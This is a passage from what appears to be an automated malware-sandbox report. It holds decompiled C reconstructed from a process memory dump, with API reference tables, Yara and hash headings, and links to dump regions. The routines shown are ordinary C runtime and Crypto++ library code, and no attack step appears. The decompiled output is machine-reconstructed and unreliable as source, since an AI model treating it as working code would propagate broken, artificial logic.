                    								if(_t127 != 0) {
                    									 *_t127 = 1;
                    								}
                    								goto L21;
                    							}
                    							_t134 = E0140131B(_t107, 4);
                    							_v20 = _t134;
                    							E014012E1(0);
                    							if(_t134 == 0) {
                    								L11:
                    								E014012E1(_v8);
                    								E014012E1(_v12);
                    								return _v16;
                    							}
                    							_push(_v8);
                    							 *_t134 = 0;
                    							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                    							_t76 = E01409B26(_t121);
                    							_t78 = E01409B26(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xf, _v8 + 4,  &_v28);
                    							_v16 = _v8 + 8;
                    							_t82 = E01409B26(_t121,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0x10, _v8 + 8, 1);
                    							_t86 = E01409B26(_t121,  &_v28, 2,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8 + 0x30, _t128);
                    							if((E01409B26(_t121,  &_v28, 2, _t128, 0xf, _v8 + 0x34, 0xe) | _t76 | _t78 | _t82 | _t86) == 0) {
                    								_t123 =  *_v16;
                    								while( *_t123 != 0) {
                    									_t92 =  *_t123;
                    									if(_t92 < 0x30 || _t92 > 0x39) {
                    										if(_t92 != 0x3b) {
                    											goto L16;
                    										}
                    										_t139 = _t123;
                    										do {
                    											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                    											_t139 = _t139 + 1;
                    										} while ( *_t139 != 0);
                    									} else {
                    										 *_t123 = _t92 - 0x30;
                    										L16:
                    										_t123 = _t123 + 1;
                    									}
                    								}
                    								_t127 = _v20;
                    								_t133 = _v8;
                    								goto L19;
                    							}
                    							E0140E2B4(_v8);
                    							_v16 = _v16 | 0xffffffff;
                    							goto L11;
                    						}
                    						E014012E1(_v8);
                    						return 1;
                    					}
                    					return 1;
                    				} else {
                    					_t127 = 0;
                    					_v12 = 0;
                    					_t133 = 0x1435348;
                    					L21:
                    					_t64 =  *(_t100 + 0x80);
                    					if(_t64 != 0) {
                    						asm("lock dec dword [eax]");
                    					}
                    					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
                    						asm("lock xadd [ecx], eax");
                    						if((_t64 | 0xffffffff) == 0) {
                    							E014012E1( *((intOrPtr*)(_t100 + 0x7c)));
                    							E014012E1( *(_t100 + 0x88));
                    						}
                    					}
                    					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
                    					 *(_t100 + 0x80) = _t127;
                    					 *(_t100 + 0x88) = _t133;
                    					return 0;
                    				}
                    			}
































                    0x0140e31d
                    0x0140e326
                    0x0140e32d
                    0x0140e330
                    0x0140e339
                    0x0140e358
                    0x0140e35b
                    0x0140e360
                    0x0140e367
                    0x0140e37a
                    0x0140e37b
                    0x0140e384
                    0x0140e386
                    0x0140e389
                    0x0140e38c
                    0x0140e392
                    0x0140e395
                    0x0140e3a8
                    0x0140e3b0
                    0x0140e50a
                    0x0140e50d
                    0x0140e512
                    0x0140e514
                    0x0140e519
                    0x0140e51c
                    0x0140e521
                    0x0140e524
                    0x0140e529
                    0x0140e52c
                    0x0140e531
                    0x0140e49a
                    0x0140e4a0
                    0x0140e4a4
                    0x0140e4a6
                    0x0140e4a6
                    0x00000000
                    0x0140e4a4
                    0x0140e3bd
                    0x0140e3c0
                    0x0140e3c3
                    0x0140e3cc
                    0x0140e461
                    0x0140e464
                    0x0140e46d
                    0x00000000
                    0x0140e476
                    0x0140e3d2
                    0x0140e3d5
                    0x0140e3da
                    0x0140e3e6
                    0x0140e3fd
                    0x0140e40e
                    0x0140e417
                    0x0140e42e
                    0x0140e452
                    0x0140e47c
                    0x0140e48f
                    0x0140e480
                    0x0140e484
                    0x0140e4f7
                    0x00000000
                    0x00000000
                    0x0140e4f9
                    0x0140e4fb
                    0x0140e4fe
                    0x0140e500
                    0x0140e503
                    0x0140e48a
                    0x0140e48c
                    0x0140e48e
                    0x0140e48e
                    0x0140e48e
                    0x0140e484
                    0x0140e494
                    0x0140e497
                    0x00000000
                    0x0140e497
                    0x0140e457
                    0x0140e45c
                    0x00000000
                    0x0140e460
                    0x0140e39a
                    0x00000000
                    0x0140e3a2
                    0x00000000
                    0x0140e343
                    0x0140e343
                    0x0140e345
                    0x0140e348
                    0x0140e4a8
                    0x0140e4a8
                    0x0140e4b0
                    0x0140e4b2
                    0x0140e4b2
                    0x0140e4ba
                    0x0140e4bf
                    0x0140e4c3
                    0x0140e4c8
                    0x0140e4d3
                    0x0140e4d9
                    0x0140e4c3
                    0x0140e4dd
                    0x0140e4e2
                    0x0140e4e8
                    0x00000000
                    0x0140e4e8

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 0cfb1ca2a8874d778d6df56b915db9f26b7b657bb191de8903b4af511f96f91b
                    • Instruction ID: 0f0dbb2bd28d3c138dfc51a8f64cd7933102225a6396d6afb947f8a66c1aa698
                    • Opcode Fuzzy Hash: 0cfb1ca2a8874d778d6df56b915db9f26b7b657bb191de8903b4af511f96f91b
                    • Instruction Fuzzy Hash: C561B071900205AFDB22DFAAC880BAEBBF4EB54720F15457BE944FB3E1D67099518B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E01407B3A(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				signed char _v15;
                    				char _v16;
                    				void _v24;
                    				short _v28;
                    				char _v31;
                    				void _v32;
                    				long _v36;
                    				intOrPtr _v40;
                    				void* _v44;
                    				signed int _v48;
                    				signed char* _v52;
                    				long _v56;
                    				int _v60;
                    				void* __ebx;
                    				void* __ebp;
                    				signed int _t78;
                    				signed int _t80;
                    				int _t86;
                    				void* _t94;
                    				long _t97;
                    				void _t105;
                    				void* _t112;
                    				signed int _t115;
                    				signed int _t117;
                    				signed char _t122;
                    				signed char _t127;
                    				intOrPtr _t128;
                    				signed int _t130;
                    				signed char* _t131;
                    				intOrPtr* _t132;
                    				signed int _t133;
                    				void* _t134;
                    
                    				_t78 =  *0x1435234; // 0x78d9f939
                    				_v8 = _t78 ^ _t133;
                    				_t80 = _a8;
                    				_t117 = _t80 >> 6;
                    				_t115 = (_t80 & 0x0000003f) * 0x30;
                    				_t131 = _a12;
                    				_v52 = _t131;
                    				_v48 = _t117;
                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x143a740 + _t117 * 4)) + _t115 + 0x18));
                    				_v40 = _a16 + _t131;
                    				_t86 = GetConsoleCP();
                    				_t132 = _a4;
                    				_v60 = _t86;
                    				 *_t132 = 0;
                    				 *((intOrPtr*)(_t132 + 4)) = 0;
                    				 *((intOrPtr*)(_t132 + 8)) = 0;
                    				while(_t131 < _v40) {
                    					_v28 = 0;
                    					_v31 =  *_t131;
                    					_t128 =  *((intOrPtr*)(0x143a740 + _v48 * 4));
                    					_t122 =  *(_t128 + _t115 + 0x2d);
                    					if((_t122 & 0x00000004) == 0) {
                    						if(( *(E01400A0F(_t115, _t128) + ( *_t131 & 0x000000ff) * 2) & 0x00008000) == 0) {
                    							_push(1);
                    							_push(_t131);
                    							goto L8;
                    						} else {
                    							if(_t131 >= _v40) {
                    								_t130 = _v48;
                    								 *((char*)( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2e)) =  *_t131;
                    								 *( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x143a740 + _t130 * 4)) + _t115 + 0x2d) | 0x00000004;
                    								 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
                    							} else {
                    								_t112 = E01409359( &_v28, _t131, 2);
                    								_t134 = _t134 + 0xc;
                    								if(_t112 != 0xffffffff) {
                    									_t131 =  &(_t131[1]);
                    									goto L9;
                    								}
                    							}
                    						}
                    					} else {
                    						_t127 = _t122 & 0x000000fb;
                    						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
                    						_push(2);
                    						_v15 = _t127;
                    						 *(_t128 + _t115 + 0x2d) = _t127;
                    						_push( &_v16);
                    						L8:
                    						_push( &_v28);
                    						_t94 = E01409359();
                    						_t134 = _t134 + 0xc;
                    						if(_t94 != 0xffffffff) {
                    							L9:
                    							_t131 =  &(_t131[1]);
                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                    							_v56 = _t97;
                    							if(_t97 != 0) {
                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                    									L19:
                    									 *_t132 = GetLastError();
                    								} else {
                    									 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 8)) - _v52 + _t131;
                    									if(_v36 >= _v56) {
                    										if(_v31 != 0xa) {
                    											goto L16;
                    										} else {
                    											_t105 = 0xd;
                    											_v32 = _t105;
                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                    												goto L19;
                    											} else {
                    												if(_v36 >= 1) {
                    													 *((intOrPtr*)(_t132 + 8)) =  *((intOrPtr*)(_t132 + 8)) + 1;
                    													 *((intOrPtr*)(_t132 + 4)) =  *((intOrPtr*)(_t132 + 4)) + 1;
                    													goto L16;
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					goto L20;
                    					L16:
                    				}
                    				L20:
                    				return E013F268B(_t132, _v8 ^ _t133);
                    			}




































                    0x01407b42
                    0x01407b49
                    0x01407b4c
                    0x01407b54
                    0x01407b58
                    0x01407b64
                    0x01407b67
                    0x01407b6a
                    0x01407b71
                    0x01407b79
                    0x01407b7c
                    0x01407b82
                    0x01407b88
                    0x01407b8d
                    0x01407b8f
                    0x01407b92
                    0x01407b97
                    0x01407ba1
                    0x01407ba8
                    0x01407bab
                    0x01407bb2
                    0x01407bb9
                    0x01407be5
                    0x01407c0b
                    0x01407c0d
                    0x00000000
                    0x01407be7
                    0x01407bea
                    0x01407cb1
                    0x01407cbd
                    0x01407cc8
                    0x01407ccd
                    0x01407bf0
                    0x01407bf7
                    0x01407bfc
                    0x01407c02
                    0x01407c08
                    0x00000000
                    0x01407c08
                    0x01407c02
                    0x01407bea
                    0x01407bbb
                    0x01407bbf
                    0x01407bc2
                    0x01407bc8
                    0x01407bca
                    0x01407bcd
                    0x01407bd1
                    0x01407c0e
                    0x01407c11
                    0x01407c12
                    0x01407c17
                    0x01407c1d
                    0x01407c23
                    0x01407c32
                    0x01407c38
                    0x01407c3e
                    0x01407c43
                    0x01407c5f
                    0x01407cd2
                    0x01407cd8
                    0x01407c61
                    0x01407c69
                    0x01407c72
                    0x01407c78
                    0x00000000
                    0x01407c7a
                    0x01407c7c
                    0x01407c7f
                    0x01407c98
                    0x00000000
                    0x01407c9a
                    0x01407c9e
                    0x01407ca0
                    0x01407ca3
                    0x00000000
                    0x01407ca3
                    0x01407c9e
                    0x01407c98
                    0x01407c78
                    0x01407c72
                    0x01407c5f
                    0x01407c43
                    0x01407c1d
                    0x00000000
                    0x01407ca6
                    0x01407ca6
                    0x01407cda
                    0x01407cec

                    APIs
                    • GetConsoleCP.KERNEL32(00000000,?,?,?,?,?,?,?,?,014082AF,?,?,00000000,?,?,?), ref: 01407B7C
                    • __fassign.LIBCMT ref: 01407BF7
                    • __fassign.LIBCMT ref: 01407C12
                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 01407C38
                    • WriteFile.KERNEL32(?,00000000,00000000,014082AF,00000000,?,?,?,?,?,?,?,?,?,014082AF,?), ref: 01407C57
                    • WriteFile.KERNEL32(?,?,00000001,014082AF,00000000,?,?,?,?,?,?,?,?,?,014082AF,?), ref: 01407C90
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: 682a7d6c3f46e0c712948e62a528a0c336532e581e2f9bb94eba264f7731e60a
                    • Instruction ID: 36e2fc44380f7f2e007058544a0e85f577f7cb6b348af79e76659e14e21b1800
                    • Opcode Fuzzy Hash: 682a7d6c3f46e0c712948e62a528a0c336532e581e2f9bb94eba264f7731e60a
                    • Instruction Fuzzy Hash: 8051D7719042499FDB11CFA9D884AEEBBF4EF09301F14816BE995E72A1E730AD41CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E013C34F6(void* __ebx, intOrPtr __ecx, void* __edx, void* __eflags) {
                    				void* _t32;
                    				void* _t34;
                    				void* _t37;
                    				void* _t39;
                    				void* _t42;
                    				void* _t44;
                    				void* _t54;
                    				intOrPtr _t55;
                    				intOrPtr _t56;
                    				void* _t66;
                    				intOrPtr _t68;
                    				intOrPtr* _t71;
                    				void* _t72;
                    
                    				_t66 = __edx;
                    				_t56 = __ecx;
                    				_t54 = __ebx;
                    				_push(0x94);
                    				E013F26C2(E014158E6);
                    				 *((intOrPtr*)(_t72 - 0x10)) = _t56;
                    				_push( *((intOrPtr*)(_t72 + 8)));
                    				_push("NameValuePairs: type mismatch for \'");
                    				_push(_t72 - 0xa0);
                    				_t32 = E013C1E24(_t66);
                    				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
                    				_t34 = E013C1DF7(_t54, _t56, _t66, _t72 - 0x88, _t32, "\', stored \'");
                    				_t55 =  *((intOrPtr*)(_t72 + 0xc));
                    				 *(_t72 - 4) = 1;
                    				_t37 = E013C1DF7(_t55, _t55 + 4, _t66, _t72 - 0x70, _t34, E013F4DFB(0x1439f60, _t55 + 4, 0x1439f60));
                    				 *(_t72 - 4) = 2;
                    				_t39 = E013C1DF7(_t55, _t55 + 4, _t66, _t72 - 0x58, _t37, "\', trying to retrieve \'");
                    				_t68 =  *((intOrPtr*)(_t72 + 0x10));
                    				 *(_t72 - 4) = 3;
                    				_t42 = E013C1DF7(_t55, _t68 + 4, _t66, _t72 - 0x40, _t39, E013F4DFB(_t68, _t68 + 4, 0x1439f60));
                    				 *(_t72 - 4) = 4;
                    				_t44 = E013C1DF7(_t55, _t68 + 4, _t66, _t72 - 0x28, _t42, 0x141a9b4);
                    				_t71 =  *((intOrPtr*)(_t72 - 0x10));
                    				_push(_t44);
                    				_push(1);
                    				 *(_t72 - 4) = 5;
                    				E013C2E51(_t71);
                    				 *_t71 = 0x141a97c;
                    				E013C6118(_t72 - 0x28, 1, 0);
                    				E013C6118(_t72 - 0x40, 1, 0);
                    				E013C6118(_t72 - 0x58, 1, 0);
                    				E013C6118(_t72 - 0x70, 1, 0);
                    				E013C6118(_t72 - 0x88, 1, 0);
                    				E013C6118(_t72 - 0xa0, 1, 0);
                    				 *_t71 = 0x141a9a0;
                    				 *((intOrPtr*)(_t71 + 0x28)) = _t55;
                    				 *((intOrPtr*)(_t71 + 0x2c)) = _t68;
                    				return E013F269C(_t71);
                    			}
















                    0x013c34f6
                    0x013c34f6
                    0x013c34f6
                    0x013c34f6
                    0x013c3500
                    0x013c3505
                    0x013c3508
                    0x013c3511
                    0x013c3516
                    0x013c3517
                    0x013c351c
                    0x013c352d
                    0x013c3534
                    0x013c353d
                    0x013c3550
                    0x013c355e
                    0x013c3563
                    0x013c356b
                    0x013c356e
                    0x013c3584
                    0x013c3592
                    0x013c3597
                    0x013c359f
                    0x013c35a4
                    0x013c35a5
                    0x013c35a7
                    0x013c35ab
                    0x013c35b7
                    0x013c35bd
                    0x013c35c9
                    0x013c35d5
                    0x013c35e1
                    0x013c35f0
                    0x013c35ff
                    0x013c3604
                    0x013c360c
                    0x013c360f
                    0x013c3617

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C3500
                      • Part of subcall function 013C1E24: __EH_prolog3.LIBCMT ref: 013C1E2B
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013C3545
                      • Part of subcall function 013F4DFB: ___unDName.LIBVCRUNTIME ref: 013F4E2E
                      • Part of subcall function 013F4DFB: InterlockedPushEntrySList.KERNEL32(?,?,?,?,01439F60,?,?,?,?,00000000,?), ref: 013F4EA2
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EAF
                      • Part of subcall function 013F4DFB: _free.LIBCMT ref: 013F4EB7
                    • ___std_type_info_name.LIBVCRUNTIME ref: 013C3576
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    Strings
                    • ', stored ', xrefs: 013C3520
                    • ', trying to retrieve ', xrefs: 013C3555
                    • NameValuePairs: type mismatch for ', xrefs: 013C3511
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$___std_type_info_name_free$EntryInterlockedListNamePush___un
                    • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                    • API String ID: 468779367-3022120042
                    • Opcode ID: 469f2380fdafe6952b71aaaca0e5ce80e6c97fe37750fc9b20b8dab5b3840976
                    • Instruction ID: fc2452cffebfa3b6e71b144a34cb19b0090c34bca190d6629ca2ab6b88fd37b0
                    • Opcode Fuzzy Hash: 469f2380fdafe6952b71aaaca0e5ce80e6c97fe37750fc9b20b8dab5b3840976
                    • Instruction Fuzzy Hash: FB3197B1940349EBDB10EBA4CC56FEEB778AF24B18F50444DE544B7282DBB16E44CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0140E7F2(intOrPtr _a4) {
                    				void* _t18;
                    
                    				_t45 = _a4;
                    				if(_a4 != 0) {
                    					E0140E539(_t45, 7);
                    					E0140E539(_t45 + 0x1c, 7);
                    					E0140E539(_t45 + 0x38, 0xc);
                    					E0140E539(_t45 + 0x68, 0xc);
                    					E0140E539(_t45 + 0x98, 2);
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa0)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa4)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0xa8)));
                    					E0140E539(_t45 + 0xb4, 7);
                    					E0140E539(_t45 + 0xd0, 7);
                    					E0140E539(_t45 + 0xec, 0xc);
                    					E0140E539(_t45 + 0x11c, 0xc);
                    					E0140E539(_t45 + 0x14c, 2);
                    					E014012E1( *((intOrPtr*)(_t45 + 0x154)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0x158)));
                    					E014012E1( *((intOrPtr*)(_t45 + 0x15c)));
                    					return E014012E1( *((intOrPtr*)(_t45 + 0x160)));
                    				}
                    				return _t18;
                    			}




                    0x0140e7f8
                    0x0140e7fd
                    0x0140e806
                    0x0140e811
                    0x0140e81c
                    0x0140e827
                    0x0140e835
                    0x0140e840
                    0x0140e84b
                    0x0140e856
                    0x0140e864
                    0x0140e872
                    0x0140e883
                    0x0140e891
                    0x0140e89f
                    0x0140e8aa
                    0x0140e8b5
                    0x0140e8c0
                    0x00000000
                    0x0140e8d0
                    0x0140e8d5

                    APIs
                      • Part of subcall function 0140E539: _free.LIBCMT ref: 0140E562
                    • _free.LIBCMT ref: 0140E840
                      • Part of subcall function 014012E1: HeapFree.KERNEL32(00000000,00000000,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?), ref: 014012F7
                      • Part of subcall function 014012E1: GetLastError.KERNEL32(?,?,0140E567,?,00000000,?,00000000,?,0140E80B,?,00000007,?,?,0140EC39,?,?), ref: 01401309
                    • _free.LIBCMT ref: 0140E84B
                    • _free.LIBCMT ref: 0140E856
                    • _free.LIBCMT ref: 0140E8AA
                    • _free.LIBCMT ref: 0140E8B5
                    • _free.LIBCMT ref: 0140E8C0
                    • _free.LIBCMT ref: 0140E8CB
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 5e432f690a3c7708a87b86f27d3176ea985df772cf3bf4f9f96ad7372940b9b0
                    • Instruction ID: 31091a80a380074290b83aac1c3653f5a0e16b18b94bbf7187276d9fd1d0ae57
                    • Opcode Fuzzy Hash: 5e432f690a3c7708a87b86f27d3176ea985df772cf3bf4f9f96ad7372940b9b0
                    • Instruction Fuzzy Hash: C411FEB1540745AAD922BBF3DC85FCBB79C5F74700F804C3EB299B61E0E6B6A5244650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E013F7BAC(void* __ecx) {
                    				void* _t4;
                    				void* _t11;
                    				void* _t16;
                    				long _t25;
                    				void* _t28;
                    
                    				if( *0x1435260 != 0xffffffff) {
                    					_t25 = GetLastError();
                    					_t11 = E013F7A20(__eflags,  *0x1435260);
                    					__eflags = _t11 - 0xffffffff;
                    					if(_t11 == 0xffffffff) {
                    						L5:
                    						_t11 = 0;
                    					} else {
                    						__eflags = _t11;
                    						if(__eflags == 0) {
                    							_t4 = E013F7A5A(__eflags,  *0x1435260, 0xffffffff);
                    							_pop(_t16);
                    							__eflags = _t4;
                    							if(_t4 != 0) {
                    								_t28 = E014009B2(_t16, 1, 0x28);
                    								__eflags = _t28;
                    								if(__eflags == 0) {
                    									L8:
                    									_t11 = 0;
                    									E013F7A5A(__eflags,  *0x1435260, 0);
                    								} else {
                    									__eflags = E013F7A5A(__eflags,  *0x1435260, _t28);
                    									if(__eflags != 0) {
                    										_t11 = _t28;
                    										_t28 = 0;
                    										__eflags = 0;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    								E014012E1(_t28);
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    					SetLastError(_t25);
                    					return _t11;
                    				} else {
                    					return 0;
                    				}
                    			}








                    0x013f7bb3
                    0x013f7bc6
                    0x013f7bcd
                    0x013f7bd0
                    0x013f7bd3
                    0x013f7bec
                    0x013f7bec
                    0x013f7bd5
                    0x013f7bd5
                    0x013f7bd7
                    0x013f7be1
                    0x013f7be7
                    0x013f7be8
                    0x013f7bea
                    0x013f7bfa
                    0x013f7bfe
                    0x013f7c00
                    0x013f7c14
                    0x013f7c14
                    0x013f7c1d
                    0x013f7c02
                    0x013f7c10
                    0x013f7c12
                    0x013f7c26
                    0x013f7c28
                    0x013f7c28
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013f7c12
                    0x013f7c2b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013f7bea
                    0x013f7bd7
                    0x013f7c33
                    0x013f7c3d
                    0x013f7bb5
                    0x013f7bb7
                    0x013f7bb7

                    APIs
                    • GetLastError.KERNEL32(?,?,013F7BA3,013F4582,01433740,00000010,013F3D4A,?,?,?,?,?,00000000,?), ref: 013F7BBA
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013F7BC8
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013F7BE1
                    • SetLastError.KERNEL32(00000000,013F7BA3,013F4582,01433740,00000010,013F3D4A,?,?,?,?,?,00000000,?), ref: 013F7C33
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: ec710b9527b16c8d889fff0146edf9f96b60a06f8c6364594aa53686efaf70c7
                    • Instruction ID: 6e812b0354845d2e8b0a51ee8b918077fb64e2c1e23ee1477b9d1e527e76f384
                    • Opcode Fuzzy Hash: ec710b9527b16c8d889fff0146edf9f96b60a06f8c6364594aa53686efaf70c7
                    • Instruction Fuzzy Hash: 9501D43220D31A5EFE2626FD7C84A663B98EB1277D720023EF714552F5FF614805A790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 58%
                    			E013C5393() {
                    				signed int _v4;
                    				intOrPtr _v20;
                    				char _v36;
                    				char _v76;
                    				intOrPtr _t31;
                    				char* _t35;
                    
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0( &_v36, "CryptoMaterial: this object does not support precomputation");
                    				_v4 = _v4 & 0x00000000;
                    				_push( &_v36);
                    				_push(0);
                    				E013C2E51( &_v76);
                    				_v76 = 0x141a7e4;
                    				E013F4EC6( &_v76, 0x142fa1c);
                    				asm("int3");
                    				_push(0x40);
                    				E013F26C2(E01415A99);
                    				E013C2AD0( &_v36, "StreamTransformation: this object doesn\'t support random access");
                    				_v4 = _v4 & 0x00000000;
                    				_push( &_v36);
                    				_push(0);
                    				_t35 =  &_v76;
                    				E013C2E51(_t35);
                    				_v76 = 0x141a7e4;
                    				E013F4EC6( &_v76, 0x142fa1c);
                    				asm("int3");
                    				_t31 = _v20;
                    				 *((intOrPtr*)(_t35 + 0xc)) = _t31;
                    				return _t31;
                    			}









                    0x013c5393
                    0x013c539a
                    0x013c53a7
                    0x013c53ac
                    0x013c53b3
                    0x013c53b4
                    0x013c53b9
                    0x013c53c6
                    0x013c53ce
                    0x013c53d3
                    0x013c53d4
                    0x013c53db
                    0x013c53e8
                    0x013c53ed
                    0x013c53f4
                    0x013c53f5
                    0x013c53f7
                    0x013c53fa
                    0x013c5407
                    0x013c540f
                    0x013c5414
                    0x013c5418
                    0x013c541b
                    0x013c541f

                    APIs
                    • __EH_prolog3.LIBCMT ref: 013C539A
                      • Part of subcall function 013C2E51: __EH_prolog3.LIBCMT ref: 013C2E58
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C53CE
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __EH_prolog3.LIBCMT ref: 013C53DB
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013C540F
                    Strings
                    • CryptoMaterial: this object does not support precomputation, xrefs: 013C539F
                    • StreamTransformation: this object doesn't support random access, xrefs: 013C53E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
